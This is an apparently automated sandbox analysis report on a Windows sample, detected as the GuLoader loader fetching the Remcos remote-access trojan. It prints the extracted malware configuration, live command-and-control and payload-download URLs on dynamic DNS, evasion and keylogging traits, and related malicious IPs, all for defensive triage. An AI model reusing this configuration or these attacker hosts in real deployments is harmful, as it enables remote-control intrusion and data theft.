Loading ...

Play interactive tourEdit tour

Windows Analysis Report 7HHrcwZjLI.exe

Overview

General Information

Sample Name:7HHrcwZjLI.exe
Analysis ID:491246
MD5:5f09b37b56cb003804dca1a778799746
SHA1:7d9924657fb4275d47b1e8ff30abfd6a1726ca70
SHA256:1f2f9b357003d7816259c172bff00bc8be6305247a94594de4eb9a7e7ecbb385
Tags:exeRATRemcosRAT
Infos:

Most interesting Screenshot:

Detection

GuLoader Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Potential malicious icon found
Multi AV Scanner detection for submitted file
GuLoader behavior detected
Yara detected Remcos RAT
Yara detected GuLoader
Hides threads from debuggers
Tries to detect Any.run
C2 URLs / IPs found in malware configuration
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Uses dynamic DNS services
Creates a DirectInput object (often for capturing keystrokes)
Uses 32bit PE files
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Uses a known web browser user agent for HTTP communication
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected TCP or UDP traffic on non-standard ports
Sleep loop found (likely to delay execution)
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Creates a process in suspended mode (likely to inject code)
IP address seen in connection with other malware
Abnormal high CPU Usage

Classification

Process Tree

  • System is w10x64
  • 7HHrcwZjLI.exe (PID: 6900 cmdline: 'C:\Users\user\Desktop\7HHrcwZjLI.exe' MD5: 5F09B37B56CB003804DCA1A778799746)
    • 7HHrcwZjLI.exe (PID: 6416 cmdline: 'C:\Users\user\Desktop\7HHrcwZjLI.exe' MD5: 5F09B37B56CB003804DCA1A778799746)
  • cleanup

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": "dyn-wave.duckdns.org:1144:1dyn-wave.duckdns.org:2404:0", "Assigned name": "RemoteHost_NEW", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Disable", "Install path": "AppData", "Copy file": "remcos.exe", "Startup value": "Remcos", "Hide file": "Disable", "Mutex": "Remcos-2LBKGP", "Keylog flag": "0", "Keylog path": "AppData", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "notepad;solitaire;", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio path": "AppData", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos", "Keylog file max size": "20000"}

Threatname: GuLoader

{"Payload URL": "http://dypage.duckdns.org/remcos_d_QUBXVO174.b"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000013.00000002.869170451.0000000000860000.00000004.00000020.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
    00000000.00000002.569030215.0000000002CD0000.00000040.00000001.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security

      Sigma Overview

      No Sigma rule has matched

      Jbx Signature Overview

      Click to jump to signature section

      Show All Signature Results

      AV Detection:

      barindex
      Found malware configurationShow sources
      Source: 00000000.00000002.569030215.0000000002CD0000.00000040.00000001.sdmpMalware Configuration Extractor: GuLoader {"Payload URL": "http://dypage.duckdns.org/remcos_d_QUBXVO174.b"}
      Source: 00000013.00000002.869170451.0000000000860000.00000004.00000020.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": "dyn-wave.duckdns.org:1144:1dyn-wave.duckdns.org:2404:0", "Assigned name": "RemoteHost_NEW", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Disable", "Install path": "AppData", "Copy file": "remcos.exe", "Startup value": "Remcos", "Hide file": "Disable", "Mutex": "Remcos-2LBKGP", "Keylog flag": "0", "Keylog path": "AppData", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "notepad;solitaire;", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio path": "AppData", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos", "Keylog file max size": "20000"}
      Multi AV Scanner detection for submitted fileShow sources
      Source: 7HHrcwZjLI.exeVirustotal: Detection: 39%Perma Link
      Source: 7HHrcwZjLI.exeReversingLabs: Detection: 15%
      Yara detected Remcos RATShow sources
      Source: Yara matchFile source: 00000013.00000002.869170451.0000000000860000.00000004.00000020.sdmp, type: MEMORY
      Machine Learning detection for sampleShow sources
      Source: 7HHrcwZjLI.exeJoe Sandbox ML: detected
      Source: 7HHrcwZjLI.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

      Networking:

      barindex
      C2 URLs / IPs found in malware configurationShow sources
      Source: Malware configuration extractorURLs: dyn-wave.duckdns.org
      Source: Malware configuration extractorURLs: http://dypage.duckdns.org/remcos_d_QUBXVO174.b
      Uses dynamic DNS servicesShow sources
      Source: unknownDNS query: name: dypage.duckdns.org
      Source: unknownDNS query: name: dyn-wave.duckdns.org
      Source: global trafficHTTP traffic detected: GET /remcos_d_QUBXVO174.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: dypage.duckdns.orgCache-Control: no-cache
      Source: global trafficTCP traffic: 192.168.2.6:49827 -> 23.146.241.70:1144
      Source: Joe Sandbox ViewASN Name: VDI-NETWORKUS VDI-NETWORKUS
      Source: Joe Sandbox ViewASN Name: VDI-NETWORKUS VDI-NETWORKUS
      Source: Joe Sandbox ViewIP Address: 23.146.242.85 23.146.242.85
      Source: 7HHrcwZjLI.exe, 00000013.00000002.868976624.00000000006B0000.00000004.00000001.sdmpString found in binary or memory: http://backupsoldyn.duckdns.org/remcos_d_QUBXVO174.bin
      Source: 7HHrcwZjLI.exe, 00000013.00000002.868976624.00000000006B0000.00000004.00000001.sdmpString found in binary or memory: http://dypage.duckdns.org/remcos_d_QUBXVO174.bin
      Source: 7HHrcwZjLI.exe, 00000013.00000002.868976624.00000000006B0000.00000004.00000001.sdmpString found in binary or memory: http://dypage.duckdns.org/remcos_d_QUBXVO174.binhttp://backupsoldyn.duckdns.org/remcos_d_QUBXVO174.b
      Source: unknownDNS traffic detected: queries for: dypage.duckdns.org
      Source: global trafficHTTP traffic detected: GET /remcos_d_QUBXVO174.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: dypage.duckdns.orgCache-Control: no-cache
      Source: 7HHrcwZjLI.exe, 00000000.00000002.568216275.000000000074A000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

      E-Banking Fraud:

      barindex
      Yara detected Remcos RATShow sources
      Source: Yara matchFile source: 00000013.00000002.869170451.0000000000860000.00000004.00000020.sdmp, type: MEMORY

      System Summary:

      barindex
      Potential malicious icon foundShow sources
      Source: initial sampleIcon embedded in PE file: bad icon match: 20047c7c70f0e004
      Source: 7HHrcwZjLI.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
      Source: 7HHrcwZjLI.exe, 00000000.00000000.344350820.0000000000430000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameTREMMERNE.exe vs 7HHrcwZjLI.exe
      Source: 7HHrcwZjLI.exe, 00000013.00000000.566360614.0000000000430000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameTREMMERNE.exe vs 7HHrcwZjLI.exe
      Source: 7HHrcwZjLI.exeBinary or memory string: OriginalFilenameTREMMERNE.exe vs 7HHrcwZjLI.exe
      Source: 7HHrcwZjLI.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: C:\Users\user\Desktop\7HHrcwZjLI.exeCode function: 0_2_004013F0
      Source: C:\Users\user\Desktop\7HHrcwZjLI.exeCode function: 19_2_0056EA07
      Source: C:\Users\user\Desktop\7HHrcwZjLI.exeCode function: 19_2_0056E855 Sleep,NtProtectVirtualMemory,
      Source: C:\Users\user\Desktop\7HHrcwZjLI.exeCode function: 19_2_0056E713 NtProtectVirtualMemory,
      Source: C:\Users\user\Desktop\7HHrcwZjLI.exeCode function: 19_2_0056E85C Sleep,NtProtectVirtualMemory,
      Source: C:\Users\user\Desktop\7HHrcwZjLI.exeCode function: 19_2_0056E6F7 NtProtectVirtualMemory,
      Source: C:\Users\user\Desktop\7HHrcwZjLI.exeCode function: 19_2_0056E6F0 NtProtectVirtualMemory,
      Source: C:\Users\user\Desktop\7HHrcwZjLI.exeCode function: 19_2_0056E7EF NtProtectVirtualMemory,Sleep,
      Source: C:\Users\user\Desktop\7HHrcwZjLI.exeCode function: 19_2_0056E56F TerminateThread,NtProtectVirtualMemory,
      Source: C:\Users\user\Desktop\7HHrcwZjLI.exeProcess Stats: CPU usage > 98%
      Source: 7HHrcwZjLI.exeVirustotal: Detection: 39%
      Source: 7HHrcwZjLI.exeReversingLabs: Detection: 15%
      Source: 7HHrcwZjLI.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\7HHrcwZjLI.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: C:\Users\user\Desktop\7HHrcwZjLI.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dll
      Source: unknownProcess created: C:\Users\user\Desktop\7HHrcwZjLI.exe 'C:\Users\user\Desktop\7HHrcwZjLI.exe'
      Source: C:\Users\user\Desktop\7HHrcwZjLI.exeProcess created: C:\Users\user\Desktop\7HHrcwZjLI.exe 'C:\Users\user\Desktop\7HHrcwZjLI.exe'
      Source: C:\Users\user\Desktop\7HHrcwZjLI.exeProcess created: C:\Users\user\Desktop\7HHrcwZjLI.exe 'C:\Users\user\Desktop\7HHrcwZjLI.exe'
      Source: C:\Users\user\Desktop\7HHrcwZjLI.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
      Source: C:\Users\user\Desktop\7HHrcwZjLI.exeMutant created: \Sessions\1\BaseNamedObjects\Remcos-2LBKGP
      Source: classification engineClassification label: mal100.rans.troj.evad.winEXE@3/0@2/2
      Source: C:\Users\user\Desktop\7HHrcwZjLI.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\user\Desktop\7HHrcwZjLI.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\user\Desktop\7HHrcwZjLI.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior

      Data Obfuscation:

      barindex
      Yara detected GuLoaderShow sources
      Source: Yara matchFile source: 00000000.00000002.569030215.0000000002CD0000.00000040.00000001.sdmp, type: MEMORY
      Source: C:\Users\user\Desktop\7HHrcwZjLI.exeCode function: 0_2_00429D10 push dword ptr [edi+000000BCh]; retn 0010h
      Source: C:\Users\user\Desktop\7HHrcwZjLI.exeCode function: 0_2_004068DE push eax; retf
      Source: C:\Users\user\Desktop\7HHrcwZjLI.exeCode function: 0_2_00406EF4 pushfd ; ret
      Source: C:\Users\user\Desktop\7HHrcwZjLI.exeCode function: 0_2_004069C0 push edx; retf
      Source: C:\Users\user\Desktop\7HHrcwZjLI.exeCode function: 0_2_00403B97 push FFFFFFC2h; retf
      Source: C:\Users\user\Desktop\7HHrcwZjLI.exeCode function: 0_2_00403F99 push edx; rep ret
      Source: initial sampleStatic PE information: section name: .text entropy: 7.41395278491
      Source: C:\Users\user\Desktop\7HHrcwZjLI.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\7HHrcwZjLI.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\7HHrcwZjLI.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\7HHrcwZjLI.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\7HHrcwZjLI.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\7HHrcwZjLI.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\7HHrcwZjLI.exeProcess information set: NOOPENFILEERRORBOX

      Malware Analysis System Evasion:

      barindex
      Tries to detect Any.runShow sources
      Source: C:\Users\user\Desktop\7HHrcwZjLI.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
      Source: C:\Users\user\Desktop\7HHrcwZjLI.exeFile opened: C:\Program Files\qga\qga.exe
      Source: C:\Users\user\Desktop\7HHrcwZjLI.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
      Source: C:\Users\user\Desktop\7HHrcwZjLI.exeFile opened: C:\Program Files\qga\qga.exe
      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
      Source: 7HHrcwZjLI.exe, 00000000.00000002.568712030.0000000002250000.00000004.00000001.sdmpBinary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERSHELL32ADVAPI32TEMP=WINDIR=\SYSWOW64\MSVBVM60.DLL
      Source: 7HHrcwZjLI.exe, 00000000.00000002.568712030.0000000002250000.00000004.00000001.sdmp, 7HHrcwZjLI.exe, 00000013.00000002.868976624.00000000006B0000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
      Source: 7HHrcwZjLI.exe, 00000013.00000002.868976624.00000000006B0000.00000004.00000001.sdmpBinary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERSHELL32ADVAPI32TEMP=HTTP://DYPAGE.DUCKDNS.ORG/REMCOS_D_QUBXVO174.BINHTTP://BACKUPSOLDYN.DUCKDNS.ORG/REMCOS_D_QUBXVO174.BINWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKO
      Source: C:\Users\user\Desktop\7HHrcwZjLI.exeWindow / User API: threadDelayed 1840
      Source: C:\Users\user\Desktop\7HHrcwZjLI.exe TID: 6912Thread sleep count: 1840 > 30
      Source: C:\Users\user\Desktop\7HHrcwZjLI.exeThread sleep count: Count: 1840 delay: -5
      Source: C:\Users\user\Desktop\7HHrcwZjLI.exeLast function: Thread delayed
      Source: C:\Users\user\Desktop\7HHrcwZjLI.exeSystem information queried: ModuleInformation
      Source: 7HHrcwZjLI.exe, 00000013.00000002.868976624.00000000006B0000.00000004.00000001.sdmpBinary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublishershell32advapi32TEMP=http://dypage.duckdns.org/remcos_d_QUBXVO174.binhttp://backupsoldyn.duckdns.org/remcos_d_QUBXVO174.binwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
      Source: 7HHrcwZjLI.exe, 00000000.00000002.568712030.0000000002250000.00000004.00000001.sdmpBinary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublishershell32advapi32TEMP=windir=\syswow64\msvbvm60.dll
      Source: 7HHrcwZjLI.exe, 00000000.00000002.568712030.0000000002250000.00000004.00000001.sdmp, 7HHrcwZjLI.exe, 00000013.00000002.868976624.00000000006B0000.00000004.00000001.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe

      Anti Debugging:

      barindex
      Hides threads from debuggersShow sources
      Source: C:\Users\user\Desktop\7HHrcwZjLI.exeThread information set: HideFromDebugger
      Source: C:\Users\user\Desktop\7HHrcwZjLI.exeThread information set: HideFromDebugger
      Source: C:\Users\user\Desktop\7HHrcwZjLI.exeProcess created: C:\Users\user\Desktop\7HHrcwZjLI.exe 'C:\Users\user\Desktop\7HHrcwZjLI.exe'
      Source: 7HHrcwZjLI.exe, 00000013.00000002.869370565.0000000000DA0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
      Source: 7HHrcwZjLI.exe, 00000013.00000002.869370565.0000000000DA0000.00000002.00020000.sdmpBinary or memory string: Progman
      Source: 7HHrcwZjLI.exe, 00000013.00000002.869370565.0000000000DA0000.00000002.00020000.sdmpBinary or memory string: &Program Manager
      Source: 7HHrcwZjLI.exe, 00000013.00000002.869370565.0000000000DA0000.00000002.00020000.sdmpBinary or memory string: Progmanlock

      Stealing of Sensitive Information:

      barindex
      GuLoader behavior detectedShow sources
      Source: Initial fileSignature Results: GuLoader behavior
      Yara detected Remcos RATShow sources
      Source: Yara matchFile source: 00000013.00000002.869170451.0000000000860000.00000004.00000020.sdmp, type: MEMORY

      Remote Access Functionality:

      barindex
      Yara detected Remcos RATShow sources
      Source: Yara matchFile source: 00000013.00000002.869170451.0000000000860000.00000004.00000020.sdmp, type: MEMORY

      Mitre Att&ck Matrix

      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid AccountsWindows Management InstrumentationPath InterceptionProcess Injection12Virtualization/Sandbox Evasion22Input Capture1Security Software Discovery31Remote ServicesInput Capture1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
      Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsProcess Injection12LSASS MemoryVirtualization/Sandbox Evasion22Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothNon-Standard Port1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Obfuscated Files or Information2Security Account ManagerProcess Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationIngress Tool Transfer1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Software Packing1NTDSApplication Window Discovery1Distributed Component Object ModelInput CaptureScheduled TransferNon-Application Layer Protocol2SIM Card SwapCarrier Billing Fraud
      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA SecretsRemote System Discovery1SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol212Manipulate Device CommunicationManipulate App Store Rankings or Ratings
      Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain CredentialsSystem Information Discovery2VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      7HHrcwZjLI.exe40%VirustotalBrowse
      7HHrcwZjLI.exe16%ReversingLabsWin32.Trojan.Mucc
      7HHrcwZjLI.exe100%Joe Sandbox ML

      Dropped Files

      No Antivirus matches

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      http://backupsoldyn.duckdns.org/remcos_d_QUBXVO174.bin0%Avira URL Cloudsafe
      http://dypage.duckdns.org/remcos_d_QUBXVO174.binhttp://backupsoldyn.duckdns.org/remcos_d_QUBXVO174.b0%Avira URL Cloudsafe
      http://dypage.duckdns.org/remcos_d_QUBXVO174.b0%Avira URL Cloudsafe
      http://dypage.duckdns.org/remcos_d_QUBXVO174.bin0%VirustotalBrowse
      http://dypage.duckdns.org/remcos_d_QUBXVO174.bin0%Avira URL Cloudsafe
      dyn-wave.duckdns.org0%Avira URL Cloudsafe

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      dypage.duckdns.org
      23.146.242.85
      truetrue
        unknown
        dyn-wave.duckdns.org
        23.146.241.70
        truetrue
          unknown

          Contacted URLs

          NameMaliciousAntivirus DetectionReputation
          http://dypage.duckdns.org/remcos_d_QUBXVO174.btrue
          • Avira URL Cloud: safe
          unknown
          http://dypage.duckdns.org/remcos_d_QUBXVO174.binfalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          unknown
          dyn-wave.duckdns.orgtrue
          • Avira URL Cloud: safe
          unknown

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          http://backupsoldyn.duckdns.org/remcos_d_QUBXVO174.bin7HHrcwZjLI.exe, 00000013.00000002.868976624.00000000006B0000.00000004.00000001.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://dypage.duckdns.org/remcos_d_QUBXVO174.binhttp://backupsoldyn.duckdns.org/remcos_d_QUBXVO174.b7HHrcwZjLI.exe, 00000013.00000002.868976624.00000000006B0000.00000004.00000001.sdmpfalse
          • Avira URL Cloud: safe
          unknown

          Contacted IPs

          • No. of IPs < 25%
          • 25% < No. of IPs < 50%
          • 50% < No. of IPs < 75%
          • 75% < No. of IPs

          Public

          IPDomainCountryFlagASNASN NameMalicious
          23.146.241.70
          dyn-wave.duckdns.orgReserved
          46664VDI-NETWORKUStrue
          23.146.242.85
          dypage.duckdns.orgReserved
          46664VDI-NETWORKUStrue

          General Information

          Joe Sandbox Version:33.0.0 White Diamond
          Analysis ID:491246
          Start date:27.09.2021
          Start time:11:56:39
          Joe Sandbox Product:CloudBasic
          Overall analysis duration:0h 8m 31s
          Hypervisor based Inspection enabled:false
          Report type:light
          Sample file name:7HHrcwZjLI.exe
          Cookbook file name:default.jbs
          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
          Number of analysed new started processes analysed:22
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:0
          Technologies:
          • HCA enabled
          • EGA enabled
          • HDC enabled
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Timeout
          Detection:MAL
          Classification:mal100.rans.troj.evad.winEXE@3/0@2/2
          EGA Information:Failed
          HDC Information:
          • Successful, ratio: 93.4% (good quality ratio 25.7%)
          • Quality average: 15.8%
          • Quality standard deviation: 29.5%
          HCA Information:Failed
          Cookbook Comments:
          • Adjust boot time
          • Enable AMSI
          • Found application associated with file extension: .exe
          • Override analysis time to 240s for sample files taking high CPU consumption
          Warnings:
          Show All
          • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
          • TCP Packets have been reduced to 100
          • Excluded IPs from analysis (whitelisted): 20.82.210.154, 20.54.110.249, 40.112.88.60, 20.82.209.183, 23.10.249.26, 23.10.249.43, 95.100.54.203, 20.82.209.104
          • Excluded domains from analysis (whitelisted): iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, e1723.g.akamaiedge.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a1449.dscg2.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, ris.api.iris.microsoft.com, iris-de-ppe-azsc-neu.northeurope.cloudapp.azure.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
          • Not all processes where analyzed, report is missing behavior information
          • Report size getting too big, too many NtOpenKeyEx calls found.
          • Report size getting too big, too many NtQueryValueKey calls found.

          Simulations

          Behavior and APIs

          No simulations

          Joe Sandbox View / Context

          IPs

          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
          23.146.242.85466XoziOLD.exeGet hashmaliciousBrowse
          • sopage.duckdns.org/Remcos_s_bChlcwVW46.bin
          hVlpEajflR.exeGet hashmaliciousBrowse
          • spage.duckdns.org/Remcos_S_tGNeLX139.bin
          0rUkHCgvVf.exeGet hashmaliciousBrowse
          • dpage.duckdns.org/remcos_d_fIqfwC80.bin
          JQPFEy9Ekx.exeGet hashmaliciousBrowse
          • dyn-bin.duckdns.org/remcos_d_fIqfwC80.bin
          http___sowork.duckdns.org_11d_solex.exeGet hashmaliciousBrowse
          • sol-bin.duckdns.org/Remcos_S_tGNeLX139.bin

          Domains

          No context

          ASN

          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
          VDI-NETWORKUS466XoziOLD.exeGet hashmaliciousBrowse
          • 23.146.242.85
          hVlpEajflR.exeGet hashmaliciousBrowse
          • 23.146.242.85
          0rUkHCgvVf.exeGet hashmaliciousBrowse
          • 23.146.242.85
          HxXHmM0T9f.exeGet hashmaliciousBrowse
          • 23.146.242.147
          JQPFEy9Ekx.exeGet hashmaliciousBrowse
          • 23.146.242.85
          http___sowork.duckdns.org_11d_solex.exeGet hashmaliciousBrowse
          • 23.146.242.85
          eXik5mFvet.exeGet hashmaliciousBrowse
          • 23.146.242.94
          CVEXzxk43s.exeGet hashmaliciousBrowse
          • 23.146.242.94
          yOCBr7SNLJ.exeGet hashmaliciousBrowse
          • 23.146.242.94
          13FlI4deWN.exeGet hashmaliciousBrowse
          • 23.146.242.94
          Payment Notification.exeGet hashmaliciousBrowse
          • 23.146.242.147
          Payment Notification.scr.exeGet hashmaliciousBrowse
          • 23.146.242.147
          Payment Notification.scr.exeGet hashmaliciousBrowse
          • 23.146.242.147
          Request For Quotation.jarGet hashmaliciousBrowse
          • 23.146.242.147
          OvBS76pTyX.exeGet hashmaliciousBrowse
          • 23.146.242.94
          U6lqJJBG8S.exeGet hashmaliciousBrowse
          • 23.146.242.94
          pNyAinWdWJ.exeGet hashmaliciousBrowse
          • 23.146.242.94
          YTVrQC7FhG.exeGet hashmaliciousBrowse
          • 23.146.242.94
          I4eRfFgJG7.exeGet hashmaliciousBrowse
          • 23.146.242.94
          sLVCW67F5w.exeGet hashmaliciousBrowse
          • 23.146.242.94
          VDI-NETWORKUS466XoziOLD.exeGet hashmaliciousBrowse
          • 23.146.242.85
          hVlpEajflR.exeGet hashmaliciousBrowse
          • 23.146.242.85
          0rUkHCgvVf.exeGet hashmaliciousBrowse
          • 23.146.242.85
          HxXHmM0T9f.exeGet hashmaliciousBrowse
          • 23.146.242.147
          JQPFEy9Ekx.exeGet hashmaliciousBrowse
          • 23.146.242.85
          http___sowork.duckdns.org_11d_solex.exeGet hashmaliciousBrowse
          • 23.146.242.85
          eXik5mFvet.exeGet hashmaliciousBrowse
          • 23.146.242.94
          CVEXzxk43s.exeGet hashmaliciousBrowse
          • 23.146.242.94
          yOCBr7SNLJ.exeGet hashmaliciousBrowse
          • 23.146.242.94
          13FlI4deWN.exeGet hashmaliciousBrowse
          • 23.146.242.94
          Payment Notification.exeGet hashmaliciousBrowse
          • 23.146.242.147
          Payment Notification.scr.exeGet hashmaliciousBrowse
          • 23.146.242.147
          Payment Notification.scr.exeGet hashmaliciousBrowse
          • 23.146.242.147
          Request For Quotation.jarGet hashmaliciousBrowse
          • 23.146.242.147
          OvBS76pTyX.exeGet hashmaliciousBrowse
          • 23.146.242.94
          U6lqJJBG8S.exeGet hashmaliciousBrowse
          • 23.146.242.94
          pNyAinWdWJ.exeGet hashmaliciousBrowse
          • 23.146.242.94
          YTVrQC7FhG.exeGet hashmaliciousBrowse
          • 23.146.242.94
          I4eRfFgJG7.exeGet hashmaliciousBrowse
          • 23.146.242.94
          sLVCW67F5w.exeGet hashmaliciousBrowse
          • 23.146.242.94

          JA3 Fingerprints

          No context

          Dropped Files

          No context

          Created / dropped Files

          No created / dropped files found

          Static File Info

          General

          File type:PE32 executable (GUI) Intel 80386, for MS Windows
          Entropy (8bit):7.204068690250343
          TrID:
          • Win32 Executable (generic) a (10002005/4) 99.15%
          • Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81%
          • Generic Win/DOS Executable (2004/3) 0.02%
          • DOS Executable Generic (2002/1) 0.02%
          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
          File name:7HHrcwZjLI.exe
          File size:196608
